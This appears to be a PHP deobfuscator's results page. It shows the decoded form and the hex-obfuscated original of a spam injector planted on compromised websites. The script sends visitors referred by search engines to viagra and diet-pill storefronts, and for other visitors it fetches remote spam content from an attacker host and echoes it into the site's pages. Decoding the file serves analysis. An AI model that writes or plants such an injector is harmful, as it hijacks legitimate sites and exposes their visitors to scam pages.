Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto h12hx; GE7yl: $Yc0o4 = str_replace("\x68\164\164\x70\72\x2f\57\x75\145\157\x6c\157\..

Decoded Output download

<?  
goto h12hx; GE7yl: $Yc0o4 = str_replace("http://ueolot.com/", "https://www.ueolot.com/", $Yc0o4); 
goto oNBsz; wyGKl: echo $Yc0o4; 
goto oeZhf; oK8Ky: function Xn5Df($bZ1wu) { 
goto SMgCH; SMgCH: $rLBBt = str_replace("x", '', "bxxixnxgx|xaxoxxlx|axsxxk|xgxoxxoxgxlxe|yxxaxhxoxo|sxexxaxrxcxh");  
goto f2YcU; yb1H8: return true; 
goto XtP9j; t8G7Z: iFziQ: 
goto yb1H8; pACi7: return false; 
goto G8vtF; XtP9j: Tr2uQ: 
goto HxyK0; f2YcU: if (preg_match("/{$rLBBt}/i", $bZ1wu)) { 
goto iFziQ; } 
goto pACi7; G8vtF: 
goto Tr2uQ; 
goto t8G7Z; HxyK0: } 
goto Tsi8e; p4i4L: exit; 
goto Z19ou; JEIWU: $Yc0o4 = QkfTP("http://4.topsale4you.rocks/Viagra/viagra19/main.php?key=" . $r7RMJ . "&host=" . $_SERVER["HTTP_HOST"] . "&www=2"); 
goto GE7yl; Y5Q6e: $Yc0o4 = str_replace("http://ueolot.com/", "https://www.ueolot.com/", $Yc0o4); 
goto QyxaE; fo34S: $Yc0o4 = aFWk4("http://4.topsale4you.rocks/Weight/weight7/main.php?key=" . $r7RMJ . "&host=" . $_SERVER["HTTP_HOST"] . "&www=2"); 
goto Y5Q6e; X8EIe: gnBUQ: 
goto StH7x; Jpuxe: if (!(preg_match("/" . "[a-zA-Z0-9]{2}iml[a-zA-Z0-9]{5}" . "\/(.*)/isU", $_SERVER["REQUEST_URI"]) || preg_match("/" . "[a-zA-Z0-9]ed[a-zA-Z0-9]{3}" . "\/(.*)/isU", $_SERVER["REQUEST_URI"]))) { 
goto lfBf7; } 
goto mgdd0; w5DFS: if (!(Xn5dF($dQMGS) && $r7RMJ !== NULL)) { 
goto qR0Ds; } 
goto d7biP; m8hTK: $r7RMJ = $_SERVER["REQUEST_URI"]; 
goto fij7O; Yh9z2: function qkFtp($hvzC1) { 
goto PaL7Y; etW_J: $rMsM4 = curl_init(); 
goto rsVm7; I5dZI: $Aa9N5 = curl_exec($rMsM4); 
goto HHtLu; rsVm7: $ogtDi = 5; 
goto G6hcg; G6hcg: curl_setopt($rMsM4, CURLOPT_URL, $hvzC1); 
goto tG25w; HHtLu: curl_close($rMsM4); 
goto UARMF; jnZIe: return $Aa9N5; 
goto kzoKc; tG25w: curl_setopt($rMsM4, CURLOPT_RETURNTRANSFER, 1); 
goto B5pja; PaL7Y: $Aa9N5 = file_get_contents($hvzC1); 
goto Lu8tz; Lu8tz: if (!empty($Aa9N5)) { 
goto FXZe8; } 
goto etW_J; UARMF: FXZe8: 
goto jnZIe; B5pja: curl_setopt($rMsM4, CURLOPT_CONNECTTIMEOUT, $ogtDi); 
goto I5dZI; kzoKc: } 
goto LxdYO; dSIVp: header("location: " . $V2zFn); 
goto T8W_F; SWwzC: $r7RMJ = $_SERVER["REQUEST_URI"]; 
goto Yh9z2; Tsi8e: $dQMGS = strtolower($_SERVER["HTTP_REFERER"]); 
goto w5DFS; pes8H: $V2zFn = "https://4.topsale4you.rocks/store/best-weight-loss-pills.html"; 
goto tP0Ef; mgdd0: $BV5X4 = "2"; 
goto SWwzC; tP0Ef: function nQlQ3($bZ1wu) { 
goto av174; CxARP: if (preg_match("/{$rLBBt}/i", $bZ1wu)) { 
goto rOWPC; } 
goto dsuEB; mts4d: 
goto fMof8; 
goto e6F4k; lmpNT: return true; 
goto Qc87w; e6F4k: rOWPC: 
goto lmpNT; av174: $rLBBt = str_replace("x", '', "bxxixnxgx|xaxoxxlx|axsxxk|xgxoxxoxgxlxe|yxxaxhxoxo|sxexxaxrxcxh"); 
goto CxARP; dsuEB: return false; 
goto mts4d; Qc87w: fMof8: 
goto FNdoC; FNdoC: } 
goto t04Fy; EPnx9: lfBf7: 
goto oZtyO; oeZhf: exit; 
goto Zm6ZT; T8W_F: exit; 
goto X8EIe; QyxaE: $Yc0o4 = str_replace("?key=", '', $Yc0o4); 
goto wyGKl; oZtyO: if (!(preg_match("/" . "[a-zA-Z0-9]{2}x[a-zA-Z0-9]{2}l[a-zA-Z0-9]" . "\/(.*)/isU", $_SERVER["REQUEST_URI"]) || preg_match("/" . "[a-zA-Z0-9]lose[a-zA-Z0-9]{3}" . "\/(.*)/isU", $_SERVER["REQUEST_URI"]))) { 
goto gKTb0; } 
goto fDDQe; D6OnJ: if (!($r7RMJ !== NULL)) { 
goto QRgse; } 
goto JEIWU; Zm6ZT: OuuOe: 
goto Ufept; fij7O: function aFWk4($hvzC1) { 
goto xVvAG; ZoTDS: curl_setopt($rMsM4, CURLOPT_URL, $hvzC1); 
goto kJit9; jQfSv: $rMsM4 = curl_init(); 
goto ouzHL; tdtNd: $Aa9N5 = curl_exec($rMsM4); 
goto KBPZ6; le2J0: curl_setopt($rMsM4, CURLOPT_CONNECTTIMEOUT, $ogtDi); 
goto tdtNd; KBPZ6: curl_close($rMsM4); 
goto FrNA4; xVvAG: $Aa9N5 = file_get_contents($hvzC1); 
goto xiEYs; FrNA4: UWGwr: 
goto mV56B; kJit9: curl_setopt($rMsM4, CURLOPT_RETURNTRANSFER, 1); 
goto le2J0; ouzHL: $ogtDi = 5; 
goto ZoTDS; xiEYs: if (!empty($Aa9N5)) { 
goto UWGwr; } 
goto jQfSv; mV56B: return $Aa9N5; 
goto GQtSO; GQtSO: } 
goto pes8H; oNBsz: $Yc0o4 = str_replace("?key=", '', $Yc0o4); 
goto Ru_Bn; sxgNw: exit; 
goto X6nes; h12hx: error_reporting(0); 
goto Jpuxe; Ru_Bn: echo $Yc0o4; 
goto sxgNw; gqaWI: if (!(Nqlq3($dQMGS) && $r7RMJ !== NULL)) { 
goto gnBUQ; } 
goto dSIVp; StH7x: if (!($r7RMJ !== NULL)) { 
goto OuuOe; } 
goto fo34S; d7biP: header("location: " . $V2zFn); 
goto p4i4L; Z19ou: qR0Ds: 
goto D6OnJ; X6nes: QRgse: 
goto EPnx9; LxdYO: $V2zFn = "https://4.topsale4you.rocks/store/viagra-online.html"; 
goto oK8Ky; fDDQe: $BV5X4 = "2"; 
goto m8hTK; t04Fy: $dQMGS = strtolower($_SERVER["HTTP_REFERER"]); 
goto gqaWI; Ufept: gKTb0: ?>

Did this file decode correctly?

Original Code


goto h12hx; GE7yl: $Yc0o4 = str_replace("\x68\164\164\x70\72\x2f\57\x75\145\157\x6c\157\x74\x2e\x63\x6f\155\57", "\x68\x74\164\160\163\72\x2f\x2f\x77\x77\167\x2e\x75\x65\157\154\x6f\x74\x2e\x63\157\x6d\x2f", $Yc0o4);
goto oNBsz; wyGKl: echo $Yc0o4;
goto oeZhf; oK8Ky: function Xn5Df($bZ1wu) {
goto SMgCH; SMgCH: $rLBBt = str_replace("\x78", '', "\x62\170\x78\151\x78\x6e\x78\x67\170\x7c\x78\x61\170\157\170\x78\154\x78\x7c\141\x78\x73\170\170\x6b\x7c\170\x67\170\157\170\x78\x6f\170\147\170\154\x78\145\x7c\171\170\x78\141\x78\150\x78\157\170\x6f\x7c\163\x78\145\x78\170\141\170\162\170\143\170\x68"); 
goto f2YcU; yb1H8: return true;
goto XtP9j; t8G7Z: iFziQ:
goto yb1H8; pACi7: return false; 
goto G8vtF; XtP9j: Tr2uQ: 
goto HxyK0; f2YcU: if (preg_match("\x2f{$rLBBt}\x2f\151", $bZ1wu)) { 
goto iFziQ; } 
goto pACi7; G8vtF: 
goto Tr2uQ; 
goto t8G7Z; HxyK0: } 
goto Tsi8e; p4i4L: exit; 
goto Z19ou; JEIWU: $Yc0o4 = QkfTP("\x68\164\164\160\x3a\x2f\57\x34\56\x74\157\x70\163\141\x6c\x65\64\x79\x6f\165\x2e\162\157\x63\x6b\x73\57\126\151\x61\147\x72\141\x2f\x76\x69\x61\x67\162\141\x31\x39\x2f\155\141\x69\x6e\x2e\160\150\x70\x3f\x6b\145\x79\75" . $r7RMJ . "\46\x68\x6f\x73\x74\75" . $_SERVER["\110\124\x54\x50\137\x48\x4f\x53\124"] . "\46\x77\167\167\75\x32"); 
goto GE7yl; Y5Q6e: $Yc0o4 = str_replace("\150\164\x74\160\72\57\x2f\165\145\157\154\157\164\x2e\x63\x6f\x6d\57", "\x68\x74\164\x70\x73\72\x2f\57\167\167\x77\56\x75\145\x6f\x6c\157\x74\x2e\x63\157\x6d\x2f", $Yc0o4); 
goto QyxaE; fo34S: $Yc0o4 = aFWk4("\x68\x74\x74\160\72\x2f\x2f\64\x2e\x74\x6f\160\x73\x61\154\x65\64\x79\x6f\165\56\162\157\x63\x6b\x73\57\x57\145\151\147\150\164\x2f\x77\145\x69\x67\150\164\x37\x2f\155\141\x69\x6e\56\160\x68\160\77\153\x65\171\75" . $r7RMJ . "\x26\150\x6f\x73\x74\75" . $_SERVER["\110\124\x54\120\x5f\110\117\123\124"] . "\x26\x77\x77\167\75\62"); 
goto Y5Q6e; X8EIe: gnBUQ: 
goto StH7x; Jpuxe: if (!(preg_match("\57" . "\x5b\141\55\x7a\101\55\132\60\55\x39\135\173\62\175\x69\155\x6c\x5b\141\55\x7a\x41\55\132\60\55\x39\x5d\173\65\x7d" . "\x5c\x2f\x28\56\x2a\51\x2f\x69\x73\x55", $_SERVER["\122\105\x51\125\x45\123\124\137\125\x52\x49"]) || preg_match("\57" . "\x5b\141\x2d\x7a\x41\55\x5a\60\x2d\x39\135\145\x64\x5b\141\x2d\172\x41\x2d\132\x30\x2d\71\x5d\173\63\x7d" . "\134\57\50\56\x2a\51\57\x69\x73\125", $_SERVER["\x52\105\x51\125\105\123\x54\137\125\122\111"]))) { 
goto lfBf7; } 
goto mgdd0; w5DFS: if (!(Xn5dF($dQMGS) && $r7RMJ !== NULL)) { 
goto qR0Ds; } 
goto d7biP; m8hTK: $r7RMJ = $_SERVER["\122\105\x51\125\x45\123\124\137\x55\122\x49"]; 
goto fij7O; Yh9z2: function qkFtp($hvzC1) { 
goto PaL7Y; etW_J: $rMsM4 = curl_init(); 
goto rsVm7; I5dZI: $Aa9N5 = curl_exec($rMsM4); 
goto HHtLu; rsVm7: $ogtDi = 5; 
goto G6hcg; G6hcg: curl_setopt($rMsM4, CURLOPT_URL, $hvzC1); 
goto tG25w; HHtLu: curl_close($rMsM4); 
goto UARMF; jnZIe: return $Aa9N5; 
goto kzoKc; tG25w: curl_setopt($rMsM4, CURLOPT_RETURNTRANSFER, 1); 
goto B5pja; PaL7Y: $Aa9N5 = file_get_contents($hvzC1); 
goto Lu8tz; Lu8tz: if (!empty($Aa9N5)) { 
goto FXZe8; } 
goto etW_J; UARMF: FXZe8: 
goto jnZIe; B5pja: curl_setopt($rMsM4, CURLOPT_CONNECTTIMEOUT, $ogtDi); 
goto I5dZI; kzoKc: } 
goto LxdYO; dSIVp: header("\x6c\157\143\141\x74\151\157\x6e\72\x20" . $V2zFn); 
goto T8W_F; SWwzC: $r7RMJ = $_SERVER["\122\x45\x51\x55\105\123\x54\137\125\x52\111"]; 
goto Yh9z2; Tsi8e: $dQMGS = strtolower($_SERVER["\x48\x54\x54\120\x5f\x52\105\x46\105\x52\105\122"]); 
goto w5DFS; pes8H: $V2zFn = "\150\x74\164\x70\163\x3a\x2f\x2f\64\x2e\x74\x6f\160\163\141\x6c\145\x34\x79\x6f\x75\x2e\162\157\x63\153\163\57\163\x74\157\162\x65\x2f\x62\145\x73\164\55\167\x65\x69\x67\x68\164\55\154\157\163\x73\x2d\x70\151\x6c\x6c\163\56\x68\164\155\x6c"; 
goto tP0Ef; mgdd0: $BV5X4 = "\62"; 
goto SWwzC; tP0Ef: function nQlQ3($bZ1wu) { 
goto av174; CxARP: if (preg_match("\x2f{$rLBBt}\x2f\151", $bZ1wu)) { 
goto rOWPC; } 
goto dsuEB; mts4d: 
goto fMof8; 
goto e6F4k; lmpNT: return true; 
goto Qc87w; e6F4k: rOWPC: 
goto lmpNT; av174: $rLBBt = str_replace("\x78", '', "\x62\x78\x78\x69\x78\156\x78\x67\x78\174\x78\x61\x78\157\x78\x78\154\x78\174\141\x78\x73\170\170\153\x7c\170\147\x78\x6f\170\x78\157\170\x67\170\x6c\x78\145\x7c\171\170\170\x61\x78\x68\x78\x6f\170\157\174\163\x78\x65\x78\170\141\170\x72\x78\143\x78\150"); 
goto CxARP; dsuEB: return false; 
goto mts4d; Qc87w: fMof8: 
goto FNdoC; FNdoC: } 
goto t04Fy; EPnx9: lfBf7: 
goto oZtyO; oeZhf: exit; 
goto Zm6ZT; T8W_F: exit; 
goto X8EIe; QyxaE: $Yc0o4 = str_replace("\77\153\x65\x79\x3d", '', $Yc0o4); 
goto wyGKl; oZtyO: if (!(preg_match("\57" . "\133\141\x2d\172\101\55\x5a\60\55\71\135\173\x32\175\x78\133\x61\55\172\101\x2d\x5a\60\55\x39\x5d\x7b\62\175\x6c\x5b\x61\x2d\172\101\55\x5a\x30\x2d\71\135" . "\x5c\x2f\50\56\x2a\51\57\x69\163\125", $_SERVER["\x52\105\121\125\105\x53\x54\x5f\x55\122\x49"]) || preg_match("\57" . "\133\141\55\x7a\x41\55\132\x30\55\71\x5d\154\157\163\x65\x5b\x61\x2d\172\x41\x2d\x5a\x30\55\x39\x5d\x7b\63\175" . "\x5c\x2f\x28\56\x2a\x29\57\x69\x73\x55", $_SERVER["\122\105\121\x55\105\123\x54\x5f\125\x52\x49"]))) { 
goto gKTb0; } 
goto fDDQe; D6OnJ: if (!($r7RMJ !== NULL)) { 
goto QRgse; } 
goto JEIWU; Zm6ZT: OuuOe: 
goto Ufept; fij7O: function aFWk4($hvzC1) { 
goto xVvAG; ZoTDS: curl_setopt($rMsM4, CURLOPT_URL, $hvzC1); 
goto kJit9; jQfSv: $rMsM4 = curl_init(); 
goto ouzHL; tdtNd: $Aa9N5 = curl_exec($rMsM4); 
goto KBPZ6; le2J0: curl_setopt($rMsM4, CURLOPT_CONNECTTIMEOUT, $ogtDi); 
goto tdtNd; KBPZ6: curl_close($rMsM4); 
goto FrNA4; xVvAG: $Aa9N5 = file_get_contents($hvzC1); 
goto xiEYs; FrNA4: UWGwr: 
goto mV56B; kJit9: curl_setopt($rMsM4, CURLOPT_RETURNTRANSFER, 1); 
goto le2J0; ouzHL: $ogtDi = 5; 
goto ZoTDS; xiEYs: if (!empty($Aa9N5)) { 
goto UWGwr; } 
goto jQfSv; mV56B: return $Aa9N5; 
goto GQtSO; GQtSO: } 
goto pes8H; oNBsz: $Yc0o4 = str_replace("\77\153\x65\x79\75", '', $Yc0o4); 
goto Ru_Bn; sxgNw: exit; 
goto X6nes; h12hx: error_reporting(0); 
goto Jpuxe; Ru_Bn: echo $Yc0o4; 
goto sxgNw; gqaWI: if (!(Nqlq3($dQMGS) && $r7RMJ !== NULL)) { 
goto gnBUQ; } 
goto dSIVp; StH7x: if (!($r7RMJ !== NULL)) { 
goto OuuOe; } 
goto fo34S; d7biP: header("\x6c\157\143\x61\164\151\x6f\156\x3a\x20" . $V2zFn); 
goto p4i4L; Z19ou: qR0Ds: 
goto D6OnJ; X6nes: QRgse: 
goto EPnx9; LxdYO: $V2zFn = "\x68\164\x74\160\163\72\57\x2f\x34\56\x74\x6f\160\x73\x61\154\145\64\171\157\165\x2e\x72\157\x63\153\163\x2f\x73\164\157\x72\145\x2f\x76\x69\141\x67\x72\x61\55\x6f\156\154\x69\156\x65\x2e\150\164\x6d\154"; 
goto oK8Ky; fDDQe: $BV5X4 = "\x32"; 
goto m8hTK; t04Fy: $dQMGS = strtolower($_SERVER["\x48\124\124\x50\x5f\x52\105\106\x45\x52\105\x52"]); 
goto gqaWI; Ufept: gKTb0:

Function Calls

None

Variables

None

Stats

MD5 987f309341896cedb7c31f82cbb79a5f
Eval Count 0
Decode Time 34 ms